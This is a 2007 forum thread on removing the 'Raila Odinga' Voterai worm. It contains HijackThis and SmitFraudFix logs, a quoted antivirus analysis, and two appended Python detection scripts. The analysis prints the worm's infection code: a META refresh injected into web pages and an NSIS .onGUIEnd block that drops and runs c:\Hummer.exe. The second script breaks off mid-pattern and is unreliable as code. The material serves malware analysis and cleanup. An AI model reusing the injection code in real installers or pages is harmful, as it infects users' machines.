How to remove Trojan.NSIS.Voter.a

Clone
September 23, 2007 at 00:35:21
Specs: WinXp, P4/256 Mb

I got infected with this virus, commonly known as the Raila Odinga Virus or Voterai, with alias names DR/NSIS.Voter.A (H+Bedv) / TROJ_VOTERAI.A (Trend) / Trojan.NSIS.Voter.a (Kaspersky) / Worm/Generic.BQP (Grisoft). It displays a vote advert for Raila Odinga; it displays the popup message "Vote Advert for Raila Odinga". Can someone help me with how to get rid of this infection? What effective removal tools can get rid of this infection, or is it possible to remove the infection manually, and are there any removal tools available right now?

Thanks for your help.

Kile.




#1
September 23, 2007 at 06:11:46

Please download and install the latest version of HijackThis v2.0.2:

Download the HijackThis Installer from this link: HijackThis

1. Save " HJTInstall.exe" to your desktop.
2. Double click on HJTInstall.exe to run the program.
3. By default it will install to C:\Program Files\Trend Micro\HijackThis.
4. Accept the license agreement by clicking the "I Accept" button.
5. Click on the "Do a system scan and save a log file" button. It will scan and then ask you to save the log.
6. Click "Save log" to save the log file and then the log will open in Notepad.
7. Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
8. Paste the log in your next reply.
9. Do NOT have HijackThis fix anything yet! Most of what it finds will be harmless or even required.

Please download SmitFraudFix from this link http://siri.urz.free.fr/Fix/Smitfra... Then extract the contents to your desktop.

!!!! Only run option #1, as running the other options on an uninfected computer will damage the desktop. !!!!


Open the "SmitfraudFix" folder and double-click "smitfraudfix.cmd"
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.
Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.



#2
September 29, 2007 at 05:06:46

Hello,

These are the results of HijackThis and SmitFraudFix:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:32:56 PM, on 9/29/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\spoolsv.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~2\tools\iesdsg.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe"
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
O4 - HKLM\..\Run: [VirusScan Online] C:\Program Files\McAfee.com\VSO\mcvsshld.exe
O4 - HKLM\..\Run: [OASClnt] C:\Program Files\McAfee.com\VSO\oasclnt.exe
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\program files\mcafee.com\agent\mcdetect.exe
O23 - Service: McAfee.com McShield (McShield) - McAfee Inc. - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: PC Tools Spyware Doctor (SDhelper) - PC Tools Research Pty Ltd - C:\Program Files\Spyware Doctor\sdhelp.exe

--
End of file - 9149 bytes


SmitFraudFix v2.227

Scan done at 12:37:10.87, Sat 09/29/2007
Run from C:\Documents and Settings\Clement\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» Process

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

»»»»»»»»»»»»»»»»»»»»»»»» hosts


»»»»»»»»»»»»»»»»»»»»»»»» C:\


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement\Application Data


»»»»»»»»»»»»»»»»»»»»»»»» Start Menu


»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Clement\FAVORI~1


»»»»»»»»»»»»»»»»»»»»»»»» Desktop


»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files


»»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys


»»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0]
"Source"="About:Home"
"SubscribedURL"="About:Home"
"FriendlyName"="My Current Home Page"

»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll


»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""


»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


»»»»»»»»»»»»»»»»»»»»»»»» Rustock

»»»»»»»»»»»»»»»»»»»»»»»» DNS

»»»»»»»»»»»»»»»»»»»»»»»» Scanning for wininet.dll infection


»»»»»»»»»»»»»»»»»»»»»»»» End

What I found are the following suspicious files:

O4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?

Whenever you try to click on one of the files, it brings up a popup ad "Vote for Raila Odinga" in any photo editor, or when you log in, all the above files open up as popup ads and keep on doing so every few minutes.

What are the procedures for getting rid of the infection, or what removal tools should I use to remove it and protect my computer against the infection?

Thanks,

Kile.

NB: Please read the following information I got from the internet about the infection:

Raila Virus
Aliases TROJ_VOTERAI.A (Trend Micro), Trojan.NSIS.Voter.a (Kaspersky) , Worm/Generic.BQP (Grisoft)

The uniqueness of the virus is that it seems to urge computer users to vote for a particular presidential candidate and thus subsequently pops up at randomized intervals.

In the month of June alone, several different versions of the same virus, dubbed Voterai by the McAfee AV firm and with aliases such as W32/Voter-B, were identified and added to the respective firms' AV databases. The virus has been categorized as low risk (it lacks mass-mailing capabilities) but rather seems to spread through removable drives and network shares.

It is estimated to have infected well over 150,000 desktop computers by the end of June in Kenya alone and still remains the most common virus problem experienced in the country at the moment. The virus group that is responsible for the virus is calling themselves "Hackers for the Raila Odinga Campaign 2007". Its association with the campaign office has not yet been determined, as our efforts to get a statement on the issue have been unsuccessful.

Given that several variants of the same virus seem to be released daily, its impact has been felt locally, especially by cybercafe operators who seem to be incubating the virus; also, the AV firms are less concerned (they only reacted after a copy made its way overseas, apparently from a student from JKUAT who had gone abroad and unknowingly carried it on his flash drive. The sample was later submitted to Sophos, who classified it as a worm (Worm/voter.B (Sophos)). We have yet to establish where McAfee, the first AV firm to detect the variant, got their sample) and seem to be reacting too slowly to the threat. Most of the updates are already useless as new variants of the virus seem to evade detection and use new infection techniques that are undetectable heuristically.

The initial assessment of the virus, which claimed it to be a Trojan, was since shown to be wrong, as Kaspersky reclassified the first variants of the virus to the Win32.autorun.XXX series after they realized it could spread through removable drives. The newer variants are harder to detect as they hardly pop up; instead they infect HTML files by appending the code "<META http-equiv='refresh' content='1;URL=http://www.raila2007.com'>" at the end of web documents (.htm, .html), which automatically redirects the page to the site above after 1 second. Other variants append the following code enclosed within a script tag (trimmed for security reasons), "<Set filesrc = fso.createtextfile(\"c:\\hummer.exe\",true)", which is meant to copy the virus to the drive and execute it (a method of spreading the virus).

Only Grisoft's AVG seemed to detect the virus embedded within the document as a VBS worm. Other AVs, including Kaspersky and Norton, couldn't find anything. An additional blank function tag "dummy()" which is repeatedly called in between statements seems to be what makes the virus undetectable. However, Kaspersky heuristics seem to catch the virus when it attempts to execute and flag it as a hidden install (of course a user will think it's a false alarm and probably allow it to execute).

We've also received reports that a new variant may be infecting zipped files. Although we have yet to confirm this, it is possible to unpack files, infect them and repack them again. But we think that it is highly unlikely, as zip functions would increase the file size of the virus up to 3 times, making it too bulky to spread, and also the zipping processes would be too slow, and that's why most viruses omit this feature. The same reports also indicate that it has mass-mailing capabilities (sends itself through Outlook), but this is highly unlikely as Outlook doesn't allow certain file extensions to be sent, especially executable files, unless the virus zips itself before the operation.

To be exact, here's the AV firms' breakdown:

Trend Micro Systems...

W32/Voter-B spreads by copying itself to removable storage devices.
When first run W32/Voter-B copies itself to:
<System>\drivers\<random name>.exe and creates the following file:
<Desktop>\Raila Odinga.gif - clean may be safely deleted.
W32/Voter-B displays the above mentioned file.
When W32/Voter-B spreads, it copies itself as well as the following files:
-- autorun.inf (clean)
-- autorun.exe (copy of W32/Voter-B)
-- Ralia Odinga.exe (copy of W32/Voter-B)
-- Ralia Odinga.gif (clean)
-- smss.exe (copy of W32/Voter-B)
W32/Voter-B creates the following registry entry to start itself automatically:
-- HKCU\Software\Microsoft\Windows\CurrentVersion\Run<original filename>.exe <System>\drivers\<original filename>.exe

McAfee Antivirus...

Overview

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes.
Aliases
* DR/NSIS.Voter.A (H+Bedv)
* TROJ_VOTERAI.A (Trend)
* Trojan.NSIS.Voter.a (Kaspersky)
* Worm/Generic.BQP (Grisoft)

Characteristics

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe", having a filesize of 97.579 bytes. The file is a Nullsoft installer file. Upon running, it drops and displays a picture file of "Raila Odinga"; this is just an attention drawer.

Apart from copying itself to the system, Raila Odinga.gif is also placed on the desktop and repeatedly opened. In the meantime, the Raila Odinga.exe binary file is silently copied to the Windows directory and a registry entry is created for it:

* c:\WINDOWS\system32\drivers\Raila Odinga.exe
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "(Default)"
Data: C:\WINDOWS\system32\drivers\Raila Odinga

It drops an innocent file called "system.dll" having a filesize of 10240 bytes.

* c:\Documents and Settings\userxyz\Local Settings\Temp\nsf5.tmp\System.dll
* c:\Documents and Settings\userxyz\Local Settings\Temp\nsv3.tmp\System.dll

A link file is added as:
* c:\Documents and Settings\userxyz\Start Menu\Programs\Startup\Raila Odinga.lnk

Symptoms

* Presence of a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes
* Picture file "Raila Odinga.gif" being placed on the desktop and repeatedly opened automatically in photo editors

Advanced analysis

Based on the 2 AV firms' breakdown, there seems to be a difference in how the virus is being detected. McAfee, the first firm to detect the virus, classifies it as a trojan, while Trend Micro seems to think it is a worm that spreads across removable drives. The differences may occur as they may have obtained different samples of the same virus from various sources. So who's correct? Apparently both.

The virus seems to have been compiled using a number of different icons most commonly the MS Word icon and the JPEG icon which make it difficult for users to differentiate between the virus and legitimate programs. The virus also seems to copy itself to removable drives and adds an autorun file to the drive to ensure automatic execution when the infected drive is accessed.

So why so many different yet undetectable copies of the same virus with different icons? Simple possibilities may be:

---The virus writer collects a number of icons, say 100, and rewrites his code, say, a hundred times and tests all the samples to make sure they are not detected by any of the AVs available. Of course this is so impractical and time consuming. Can't work. So we go to option two:

---The virus may be carrying its source code along with it, and once it finds a suitable system with a compiler it proceeds to collect icons from the host system and recompiles itself, at the same time changing aspects of its code or downloading the latest code from the internet. Seems practical enough, as some viruses are known to do the same thing. But then it requires too much skill, which the virus writer may not have.

---The most likely way is that the virus infects source code on other users' systems. They proceed to compile the code unknowingly and distribute it. This is difficult to detect, as these programs may be flagged by AV software as malicious, yet the user knows that he acquired the program from a reliable source.

We have since received an infected source file which we examined and the results are as follows:

The file confirms option 3, whereby the virus infects source files. Apparently it infects one file (we think). The virus seems to infect a .nsh file extension that belongs to the Nullsoft Installer, which is also the language that the virus is coded in. It appends the following lines:

!include "C:\Program Files\NSIS\Contrib\Modern UI\System.nsh" --- normal header declaration
---------------------added by the -----
!define REDIRECT_ME "redirect"
!ifdef REDIRECT_ME
Function .onGUIEnd
SetOutPath "c:\"
File "$WHEREIS\$filename"
ExecShell "open" "c:\Hummer.exe"
FunctionEnd
!endif

The code above hijacks the function .onGUIEnd, which usually executes after an installer completes. Basically, during compilation the code above includes the virus file in the installer; when the installation of the particular program completes, the function copies the virus file to c:\Hummer.exe and executes it, infecting your system. We have yet to determine how effective this technique is or how many installers may be infected. But given that the Nullsoft Install System is largely used by non-Microsoft programmers (Microsoft has its own installer, which uses MSI technology), who are really few and most of whom are very likely to notice the change in the file, it's highly unlikely that this technique poses a major threat.
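A small triage script for HijackThis log lines like the ones posted above, added here as an example that is not part of the original thread and not a HijackThis feature. It flags Startup shortcuts whose target could not be resolved, Run values with an empty name or a target under system32\drivers (the location the quoted writeup names), script targets, and an overridden IE window title, all for human review rather than automatic fixing; the sample lines are copied from the log in this post.

```python
"""Triage HijackThis 2.x log lines for the auto-start signs discussed in this
thread. It only reports entries for human review; it changes nothing."""
import re
from typing import Dict, List

# O4 Run/RunServices entries: "O4 - HKLM\..\Run: [name] target"
RUN_RE = re.compile(
    r"^O4 - (?P<hive>\S+?)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]*)\] (?P<target>.+)$"
)
# O4 Startup-folder shortcuts: "O4 - Startup: name.lnk = target"
STARTUP_RE = re.compile(r"^O4 - (?:Global )?Startup: (?P<name>.+?) = (?P<target>.+)$")
# R1 Internet Explorer window-title override
TITLE_RE = re.compile(r"^R1 - .*\\Main,Window Title = (?P<title>.+)$")
# The quoted writeup says the worm copies itself to <System>\drivers\ and adds a Run value.
DRIVERS_DIR_RE = re.compile(r"\\system32\\drivers\\", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd)(\s|$)", re.IGNORECASE)


def triage(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return one {"line": ..., "reason": ...} dict per suspicious observation."""
    findings: List[Dict[str, str]] = []
    for raw in log_lines:
        line = raw.rstrip()
        m = RUN_RE.match(line)
        if m:
            target = m.group("target")
            reasons = []
            if not m.group("name"):
                reasons.append("Run value with an empty name (stored as the key's default value)")
            if DRIVERS_DIR_RE.search(target):
                reasons.append("auto-start target sits in system32\\drivers, which normally holds driver files, not programs")
            if SCRIPT_EXT_RE.search(target):
                reasons.append("auto-start target is a script file")
            findings.extend({"line": line, "reason": r} for r in reasons)
            continue
        m = STARTUP_RE.match(line)
        if m and m.group("target").strip() == "?":
            findings.append({"line": line, "reason": "Startup shortcut whose target could not be resolved"})
            continue
        m = TITLE_RE.match(line)
        if m:
            findings.append({"line": line, "reason": "IE window title overridden: " + m.group("title")})
    return findings


# A few lines copied from the log posted above (not the whole log).
SAMPLE_LOG = r"""
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - Startup: scan.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
""".strip().splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['reason']}\n    {f['line']}")
```

Every flagged line still needs a human decision (the TVR Schedule shortcut is flagged only because HijackThis could not resolve it), which is why the script reports rather than fixes.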

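The two file-infection markers the quoted writeup describes (the META refresh appended to .htm/.html documents and the injected .onGUIEnd block in .nsh scripts), as an added detection example that is not part of the original post and not any AV vendor's tool. It treats www.raila2007.com and c:\Hummer.exe as the indicators the writeup names, also flags any refresh tag placed after a page's closing </html> as appended, and uses constructed sample files.

```python
"""Detect the two file-infection markers in the quoted writeup: a META refresh
appended to finished .htm/.html pages and an injected NSIS .onGUIEnd dropper."""
import re
from pathlib import Path
from typing import List, Tuple

KNOWN_REDIRECT_HOST = "www.raila2007.com"  # target named in the writeup

# Any META refresh tag; group 1 captures the URL it redirects to.
META_REFRESH_RE = re.compile(
    r"""<meta\s+http-equiv\s*=\s*['"]?refresh['"]?\s+content\s*=\s*['"]\s*\d+\s*;\s*url\s*=\s*([^'"]+)['"]\s*/?>""",
    re.IGNORECASE,
)
CLOSING_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)
# A .onGUIEnd function that, before its FunctionEnd, launches c:\Hummer.exe.
NSH_INJECT_RE = re.compile(
    r'Function\s+\.onGUIEnd\b(?:(?!FunctionEnd).)*?'
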